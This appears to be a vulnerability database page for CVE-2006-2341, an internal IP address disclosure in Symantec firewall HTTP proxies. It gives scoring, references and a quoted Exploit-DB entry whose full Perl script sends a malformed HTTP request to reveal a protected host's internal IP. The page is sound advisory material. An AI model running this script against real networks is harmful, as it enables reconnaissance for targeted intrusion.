CVE-2006-2341 : Detail

CVE-2006-2341

A01-Broken Access Control
1.38%V3
Network
2006-05-11
23h00 +00:00
2018-10-18
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The HTTP proxy in Symantec Gateway Security 5000 Series 2.0.1 and 3.0, and Enterprise Firewall 8.0, when NAT is being used, allows remote attackers to determine internal IP addresses by using malformed HTTP requests, as demonstrated using a get request without a space separating the URI.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 27852

Publication date : 2006-05-09 22h00 +00:00
Author : Bernhard Mueller
EDB Verified : Yes

source: https://www.securityfocus.com/bid/17936/info Symantec Enterprise Firewall and Gateway Security products are prone to an information-disclosure weakness. The vendor has reported that the NAT/HTTP proxy component of the products may reveal the internal IP addresses of protected computers. An attacker may use this information to carry out targeted attacks against a potentially vulnerable host. #!/usr/bin/perl # [title] raptor firewall internal IP disclosure 'exploit' # [mailto] research [at] sec-consult [dot} com # # sk0L@b4byl0n:~/home/sk0L> perl raptor-nat.pl behind.raptor.com # waiting for timeout (this can take about 1 min.) # behind.raptor.com: 10.238.94.67 use IO::Socket; $| = 1; $host = $ARGV[0] or die "$0 <host>\n"; $request = "getXXX/XXX HTTP/1.0\n\n"; my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp', ); die "could not open socket: $!\n" unless $sock; print $sock $request; print "waiting for timeout (this can take about 1 min.)\n"; while (<$sock>) { if ($_ =~ /http:\/\/(\d+\.\d+\.\d+\.\d+)XXX/) { $ip = $1; } } if (defined($ip)) { print "$host: $ip\n"; } else { print "failed.\n"; } close($sock);

Products Mentioned

Configuraton 0

Symantec>>Enterprise_firewall >> Version 8.0

Symantec>>Gateway_security >> Version 2.0.1

Symantec>>Gateway_security >> Version 3.0

    Configuraton 0

    Symantec>>Gateway_security >> Version 5000_series_2.0.1

      Symantec>>Gateway_security >> Version 5000_series_3.0

        References

        http://www.securityfocus.com/bid/17936
        Tags : vdb-entry, x_refsource_BID
        http://www.vupen.com/english/advisories/2006/1764
        Tags : vdb-entry, x_refsource_VUPEN
        http://securitytracker.com/id?1016057
        Tags : vdb-entry, x_refsource_SECTRACK
        http://securitytracker.com/id?1016058
        Tags : vdb-entry, x_refsource_SECTRACK
        http://secunia.com/advisories/20082
        Tags : third-party-advisory, x_refsource_SECUNIA